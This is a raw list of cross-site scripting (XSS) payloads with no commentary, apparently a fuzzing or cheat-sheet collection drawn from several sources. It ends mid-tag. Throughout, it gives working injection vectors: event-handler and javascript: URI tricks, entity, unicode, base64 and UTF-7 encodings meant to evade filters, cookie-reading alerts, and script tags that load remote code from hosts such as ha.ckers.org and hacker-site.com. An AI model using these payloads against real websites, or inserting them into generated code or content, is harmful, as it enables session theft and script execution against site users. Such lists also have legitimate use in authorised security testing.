'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera} +<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button> +<div onmouseover='alert&lpar;1&rpar;'>DIV</div> +<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> +<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> +<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> +<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> +<var onmouseover="prompt(1)">On Mouse Over</var> +<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> +<img src="/" =_=" title="onerror='prompt(1)'"> +<%<!--'%><script>alert(1);</script --> +<script src="data:text/javascript,alert(1)"></script> +<iframe/src \/\/onload = prompt(1) +<iframe/onreadystatechange=alert(1) +<svg/onload=alert(1) +<input value=<><iframe/src=javascript:confirm(1) +<input type="text" value=`` <div/onmouseover='alert(1)'>X</div> +<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> +<img src=`xx:xx`onerror=alert(1)> 
+<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> +<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/> +<math><a xlink:href="//jsfiddle.net/t846h/">click +<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> +<svg contentScriptType=text/vbs><script>MsgBox+1 +<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a +<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> +<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ +<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F +<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script +<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)> +<script>+-+-1-+-+alert(1)</script> +<body/onload=&lt;!--&gt;&#10alert(1)> +<script itworksinallbrowsers>/*<script* */alert(1)</script +<img src ?itworksonchrome?\/onerror = alert(1) +<svg><script>//&NewLine;confirm(1);</script </svg> +<svg><script onlypossibleinopera:-)> alert(1) +<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe +<script x> alert(1) </script 1=2 +<div/onmouseover='alert(1)'> style="x:"> +<--`<img/src=` onerror=alert(1)> --!> +<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> +<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> +"><img src=x onerror=window.open('https://www.google.com/');> +<form><button formaction=javascript&colon;alert(1)>CLICKME +<math><a xlink:href="//jsfiddle.net/t846h/">click +<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> +<iframe 
src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> +<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a> +'';!--"<XSS>=&{()} +'>//\\,<'>">">"*" +'); alert('XSS +<script>alert(1);</script> +<script>alert('XSS');</script> +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=javascript:alert(&quot;XSS&quot;)> +<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> +<scr<script>ipt>alert('XSS');</scr</script>ipt> +<script>alert(String.fromCharCode(88,83,83))</script> +<img src=foo.png onerror=alert(/xssed/) /> +<style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style> +<? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?> +<marquee><script>alert('XSS')</script></marquee> +<IMG SRC=\"jav&#x09;ascript:alert('XSS');\"> +<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\"> +<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\"> +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> +"><script>alert(0)</script> +<script src=http://yoursite.com/your_files.js></script> +</title><script>alert(/xss/)</script> +</textarea><script>alert(/xss/)</script> +<IMG LOWSRC=\"javascript:alert('XSS')\"> +<IMG DYNSRC=\"javascript:alert('XSS')\"> +<font style='color:expression(alert(document.cookie))'> +<img src="javascript:alert('XSS')"> +<script language="JavaScript">alert('XSS')</script> +<body onunload="javascript:alert('XSS');"> +<body onLoad="alert('XSS');" +[color=red' onmouseover="alert('xss')"]mouse over[/color] +"/></a></><img src=1.gif onerror=alert(1)> +window.alert("Bonjour !"); +<div style="x:expression((window.r==1)?'':eval('r=1; +alert(String.fromCharCode(88,83,83));'))"> +<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe> 
+"><script alert(String.fromCharCode(88,83,83))</script> +'>><marquee><h1>XSS</h1></marquee> +'">><script>alert('XSS')</script> +'">><marquee><h1>XSS</h1></marquee> +<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\"> +<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"> +<script>var var = 1; alert(var)</script> +<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> +<?='<SCRIPT>alert("XSS")</SCRIPT>'?> +<IMG SRC='vbscript:msgbox(\"XSS\")'> +" onfocus=alert(document.domain) "> <" +<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET> +<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS +perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out +perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out +<br size=\"&{alert('XSS')}\"> +<scrscriptipt>alert(1)</scrscriptipt> +</br style=a:expression(alert())> +</script><script>alert(1)</script> +"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> +[color=red width=expression(alert(123))][color] +<BASE HREF="javascript:alert('XSS');//"> +Execute(MsgBox(chr(88)&chr(83)&chr(83)))< +"></iframe><script>alert(123)</script> +<body onLoad="while(true) alert('XSS');"> +'"></title><script>alert(1111)</script> +</textarea>'"><script>alert(document.cookie)</script> +'""><script language="JavaScript"> alert('X \nS \nS');</script> +</script></script><<<<script><>>>><<<script>alert(123)</script> +<html><noalert><noscript>(123)</noscript><script>(123)</script> +<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> +'></select><script>alert(123)</script> +'>"><script src = 'http://www.site.com/XSS.js'></script> +}</style><script>a=eval;b=alert;a(b(/XSS/.source));</script> +<SCRIPT>document.write("XSS");</SCRIPT> +a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d); +='><script>alert("xss")</script> +<script+src=">"+src="http://yoursite.com/xss.js?69,69"></script> +<body 
background=javascript:'"><script>alert(navigator.userAgent)</script>></body> +">/XaDoS/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script> +">/KinG-InFeT.NeT/><script>alert(document.cookie)</script> +src="http://www.site.com/XSS.js"></script> +data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4= +!--" /><script>alert('xss');</script> +<script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee> +"><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee> +'"></title><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee> +<img """><script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee> +<script>alert(1337)</script><marquee><h1>XSS by xss</h1></marquee> +"><script>alert(1337)</script>"><script>alert("XSS by \nxss</h1></marquee> +'"></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee> +<iframe src="javascript:alert('XSS by \nxss');"></iframe><marquee><h1>XSS by xss</h1></marquee> +'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=' +"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=" +\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=\' +http://www.simpatie.ro/index.php?page=friends&member=781339&javafunctionname=Pageclick&javapgno=2 javapgno=2 ??XSS?? +http://www.simpatie.ro/index.php?page=top_movies&cat=13&p=2 p=2 ??XSS?? 
+'); alert('xss'); var x=' +\\'); alert(\'xss\');var x=\' +//--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83)); +>"><ScRiPt%20%0a%0d>alert(561177485777)%3B</ScRiPt> +<img src="Mario Heiderich says that svg SHOULD not be executed trough image tags" onerror="javascript:document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0064\u0061\u0074\u0061\u003a\u0069\u006d\u0061\u0067\u0065\u002f\u0073\u0076\u0067\u002b\u0078\u006d\u006c\u003b\u0062\u0061\u0073\u0065\u0036\u0034\u002c\u0050\u0048\u004e\u0032\u005a\u0079\u0042\u0034\u0062\u0057\u0078\u0075\u0063\u007a\u0030\u0069\u0061\u0048\u0052\u0030\u0063\u0044\u006f\u0076\u004c\u0033\u0064\u0033\u0064\u0079\u0035\u0033\u004d\u0079\u0035\u0076\u0063\u006d\u0063\u0076\u004d\u006a\u0041\u0077\u004d\u0043\u0039\u007a\u0064\u006d\u0063\u0069\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u0070\u0062\u0057\u0046\u006e\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0045\u0070\u0049\u006a\u0034\u0038\u004c\u0032\u006c\u0074\u0059\u0057\u0064\u006c\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u007a\u0064\u006d\u0063\u0067\u0062\u0032\u0035\u0073\u0062\u0032\u0046\u006b\u0050\u0053\u004a\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u0079\u004b\u0053\u0049\u002b\u0050\u0043\u0039\u007a\u0064\u006d\u0063\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0048\u004e\u006a\u0063\u006d\u006c\u0077\u0064\u0044\u0035\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u007a\u004b\u0054\u0077\u0076\u0063\u0032\u004e\u0079\u0061\u0058\u0042\u0030\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u006b\u005a\u0057\u005a\u007a\u0049\u0047\u0039\u0075\u0062\u0047\u0039\u0068\u005a\u0044\u0030\u0069\u0059\u0057\u0078\u006c\u0063\u006e\u0051\u006f\u004e\u0043\u006b\u0069\u0050\u006a\u0077\u0076\u005a\u0047\u0056\u006d\u0063\u007a\u0034\u0067\u0049\u004
1\u006f\u0067\u0049\u0043\u0041\u0038\u005a\u0079\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0055\u0070\u0049\u006a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0067\u0050\u0047\u004e\u0070\u0063\u006d\u004e\u0073\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0059\u0070\u0049\u0069\u0041\u0076\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0038\u0064\u0047\u0056\u0034\u0064\u0043\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0063\u0070\u0049\u006a\u0034\u0038\u004c\u0033\u0052\u006c\u0065\u0048\u0051\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0043\u0039\u006e\u0050\u0069\u0041\u0067\u0043\u006a\u0077\u0076\u0063\u0033\u005a\u006e\u0050\u0069\u0041\u0067\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');"></img> +</body> +</html> +<SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT> +<SCRIPT> alert(“XSS”); </SCRIPT> +<BODY ONLOAD=alert("XSS")> +<BODY BACKGROUND="javascript:alert('XSS')"> +<IMG SRC="javascript:alert('XSS');"> +<IMG DYNSRC="javascript:alert('XSS')"> +<IMG LOWSRC="javascript:alert('XSS')"> +<IFRAME SRC=”http://hacker-site.com/xss.html”> +<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> +<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> +<TABLE BACKGROUND="javascript:alert('XSS')"> +<TD BACKGROUND="javascript:alert('XSS')"> +<DIV STYLE="background-image: url(javascript:alert('XSS'))"> +<DIV STYLE="width: expression(alert('XSS'));"> +<OBJECT TYPE="text/x-scriptlet" DATA="http://hacker.com/xss.html"> +<EMBED SRC="http://hacker.com/xss.swf" AllowScriptAccess="always"> 
+&apos;;alert(String.fromCharCode(88,83,83))//\&apos;;alert(String.fromCharCode(88,83,83))//&quot;;alert(String.fromCharCode(88,83,83))//\&quot;;alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;&quot;&gt;&apos;&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt; +&apos;&apos;;!--&quot;&lt;XSS&gt;=&amp;{()} +&lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt; +&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt; +&lt;BASE HREF=&quot;javascript:alert(&apos;XSS&apos;);//&quot;&gt; +&lt;BGSOUND SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;BODY BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;BODY ONLOAD=alert(&apos;XSS&apos;)&gt; +&lt;DIV STYLE=&quot;background-image: url(javascript:alert(&apos;XSS&apos;))&quot;&gt; +&lt;DIV STYLE=&quot;background-image: url(&amp;#1;javascript:alert(&apos;XSS&apos;))&quot;&gt; +&lt;DIV STYLE=&quot;width: expression(alert(&apos;XSS&apos;));&quot;&gt; +&lt;FRAMESET&gt;&lt;FRAME SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;&lt;/FRAMESET&gt; +&lt;IFRAME SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;&lt;/IFRAME&gt; +&lt;INPUT TYPE=&quot;IMAGE&quot; SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;IMG SRC=javascript:alert(&apos;XSS&apos;)&gt; +&lt;IMG DYNSRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;IMG LOWSRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;IMG SRC=&quot;http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode&quot;&gt; +Redirect 302 /a.jpg http://victimsite.com/admin.asp&amp;deleteuser +exp/*&lt;XSS STYLE=&apos;no\xss:noxss(&quot;*//*&quot;); +&lt;STYLE&gt;li {list-style-image: url(&quot;javascript:alert(&#39;XSS&#39;)&quot;);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS +&lt;IMG SRC=&apos;vbscript:msgbox(&quot;XSS&quot;)&apos;&gt; +&lt;LAYER 
SRC=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/LAYER&gt; +&lt;IMG SRC=&quot;livescript:[code]&quot;&gt; +%BCscript%BEalert(%A2XSS%A2)%BC/script%BE +&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=javascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&quot;&gt; +&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0; URL=http://;URL=javascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;IMG SRC=&quot;mocha:[code]&quot;&gt; +&lt;OBJECT TYPE=&quot;text/x-scriptlet&quot; DATA=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/OBJECT&gt; +&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:alert(&apos;XSS&apos;)&gt;&lt;/OBJECT&gt; +&lt;EMBED SRC=&quot;http://ha.ckers.org/xss.swf&quot; AllowScriptAccess=&quot;always&quot;&gt;&lt;/EMBED&gt; +a=&quot;get&quot;;&amp;#10;b=&quot;URL(&quot;&quot;;&amp;#10;c=&quot;javascript:&quot;;&amp;#10;d=&quot;alert(&apos;XSS&apos;);&quot;)&quot;;&#10;eval(a+b+c+d); +&lt;STYLE TYPE=&quot;text/javascript&quot;&gt;alert(&apos;XSS&apos;);&lt;/STYLE&gt; +&lt;IMG STYLE=&quot;xss:expr/*XSS*/ession(alert(&apos;XSS&apos;))&quot;&gt; +&lt;XSS STYLE=&quot;xss:expression(alert(&apos;XSS&apos;))&quot;&gt; +&lt;STYLE&gt;.XSS{background-image:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt; +&lt;STYLE type=&quot;text/css&quot;&gt;BODY{background:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;)}&lt;/STYLE&gt; +&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;http://ha.ckers.org/xss.css&quot;&gt; +&lt;STYLE&gt;@import&apos;http://ha.ckers.org/xss.css&apos;;&lt;/STYLE&gt; +&lt;META HTTP-EQUIV=&quot;Link&quot; Content=&quot;&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet&quot;&gt; 
+&lt;STYLE&gt;BODY{-moz-binding:url(&quot;http://ha.ckers.org/xssmoz.xml#xss&quot;)}&lt;/STYLE&gt; +&lt;TABLE BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/TABLE&gt; +&lt;TABLE&gt;&lt;TD BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/TD&gt;&lt;/TABLE&gt; +&lt;HTML xmlns:xss&gt; +&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=&quot;javas]]&gt;&lt;![CDATA[cript:alert(&apos;XSS&apos;);&quot;&gt;]]&gt; +&lt;XML ID=&quot;xss&quot;&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=&quot;javas&lt;!-- --&gt;cript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt; +&lt;XML SRC=&quot;http://ha.ckers.org/xsstest.xml&quot; ID=I&gt;&lt;/XML&gt; +&lt;HTML&gt;&lt;BODY&gt; +&lt;!--[if gte IE 4]&gt; +&lt;META HTTP-EQUIV=&quot;Set-Cookie&quot; Content=&quot;USERID=&lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt;&quot;&gt; +&lt;XSS STYLE=&quot;behavior: url(http://ha.ckers.org/xss.htc);&quot;&gt; +&lt;SCRIPT SRC=&quot;http://ha.ckers.org/xss.jpg&quot;&gt;&lt;/SCRIPT&gt; +&lt;!--#exec cmd=&quot;/bin/echo &apos;&lt;SCRIPT SRC&apos;&quot;--&gt;&lt;!--#exec cmd=&quot;/bin/echo &apos;=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;&apos;&quot;--&gt; +&lt;? 
echo(&apos;&lt;SCR)&apos;; +&lt;BR SIZE=&quot;&amp;{alert(&apos;XSS&apos;)}&quot;&gt; +&lt;IMG SRC=JaVaScRiPt:alert(&apos;XSS&apos;)&gt; +&lt;IMG SRC=javascript:alert(&amp;quot;XSS&amp;quot;)&gt; +&lt;IMG SRC=`javascript:alert(&quot;RSnake says, &apos;XSS&apos;&quot;)`&gt; +&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt; +&lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt; +&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt; +&lt;DIV STYLE=&quot;background-image:\0075\0072\006C\0028&apos;\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029&apos;\0029&quot;&gt; +&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt; +&lt;HEAD&gt;&lt;META HTTP-EQUIV=&quot;CONTENT-TYPE&quot; CONTENT=&quot;text/html; charset=UTF-7&quot;&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert(&apos;XSS&apos;);+ADw-/SCRIPT+AD4- +\&quot;;alert(&apos;XSS&apos;);// +&lt;/TITLE&gt;&lt;SCRIPT&gt;alert("XSS");&lt;/SCRIPT&gt; +&lt;STYLE&gt;@im\port&apos;\ja\vasc\ript:alert(&quot;XSS&quot;)&apos;;&lt;/STYLE&gt; +&lt;IMG SRC=&quot;jav&#x09;ascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;IMG SRC=&quot;jav&amp;#x09;ascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;IMG SRC=&quot;jav&amp;#x0A;ascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;IMG SRC=&quot;jav&amp;#x0D;ascript:alert(&apos;XSS&apos;);&quot;&gt; 
+&lt;IMG&#x0D;SRC&#x0D;=&#x0D;&quot;&#x0D;j&#x0D;a&#x0D;v&#x0D;a&#x0D;s&#x0D;c&#x0D;r&#x0D;i&#x0D;p&#x0D;t&#x0D;:&#x0D;a&#x0D;l&#x0D;e&#x0D;r&#x0D;t&#x0D;(&#x0D;&apos;&#x0D;X&#x0D;S&#x0D;S&#x0D;&apos;&#x0D;)&#x0D;&quot;&#x0D;&gt;&#x0D; +perl -e &apos;print &quot;&lt;IMG SRC=java\0script:alert(&quot;XSS&quot;)>&quot;;&apos;&gt; out +perl -e &apos;print &quot;&amp;&lt;SCR\0IPT&gt;alert(&quot;XSS&quot;)&lt;/SCR\0IPT&gt;&quot;;&apos; &gt; out +&lt;IMG SRC=&quot; &amp;#14; javascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;SCRIPT/XSS SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt; +&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(&quot;XSS&quot;)&gt; +&lt;SCRIPT SRC=http://ha.ckers.org/xss.js +&lt;SCRIPT SRC=//ha.ckers.org/.j&gt; +&lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;)&quot; +&lt;IFRAME SRC=http://ha.ckers.org/scriptlet.html &lt; +&lt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;);//&lt;&lt;/SCRIPT&gt; +&lt;IMG &quot;&quot;&quot;&gt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&quot;&gt; +&lt;SCRIPT&gt;a=/XSS/ +&lt;SCRIPT a=&quot;&gt;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT =&quot;blah&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT a=&quot;blah&quot; &apos;&apos; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT &quot;a=&apos;&gt;&apos;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT a=`&gt;` SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT&gt;document.write(&quot;&lt;SCRI&quot;);&lt;/SCRIPT&gt;PT SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT a=&quot;>&apos;>&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt; +&lt;A HREF=&quot;http://66.102.7.147/&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;http://1113982867/&quot;&gt;XSS&lt;/A&gt; +&lt;A 
HREF=&quot;http://0x42.0x0000066.0x7.0x93/&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;http://0102.0146.0007.00000223/&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;h&#x0A;tt&#09;p://6&amp;#09;6.000146.0x7.147/&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;//www.google.com/&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;//google&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;http://ha.ckers.org@google&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;http://google:ha.ckers.org&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;http://google.com/&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;http://www.google.com./&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;javascript:document.location=&apos;http://www.google.com/&apos;&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;http://www.gohttp://www.google.com/ogle.com/&quot;&gt;XSS&lt;/A&gt; +<script>document.vulnerable=true;</script> +<img SRC="jav ascript:document.vulnerable=true;"> +<img SRC="javascript:document.vulnerable=true;"> +<img SRC=" &#14; javascript:document.vulnerable=true;"> +<body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;> +<<SCRIPT>document.vulnerable=true;//<</SCRIPT> +<script <B>document.vulnerable=true;</script> +<img SRC="javascript:document.vulnerable=true;" +<iframe src="javascript:document.vulnerable=true; < +<script>a=/XSS/\ndocument.vulnerable=true;</script> +\";document.vulnerable=true;;// +</title><SCRIPT>document.vulnerable=true;</script> +<input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;"> +<body BACKGROUND="javascript:document.vulnerable=true;"> +<body ONLOAD=document.vulnerable=true;> +<img DYNSRC="javascript:document.vulnerable=true;"> +<img LOWSRC="javascript:document.vulnerable=true;"> +<bgsound SRC="javascript:document.vulnerable=true;"> +<br SIZE="&{document.vulnerable=true}"> +<LAYER SRC="javascript:document.vulnerable=true;"></LAYER> +<link REL="stylesheet" HREF="javascript:document.vulnerable=true;"> +<style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS +<img 
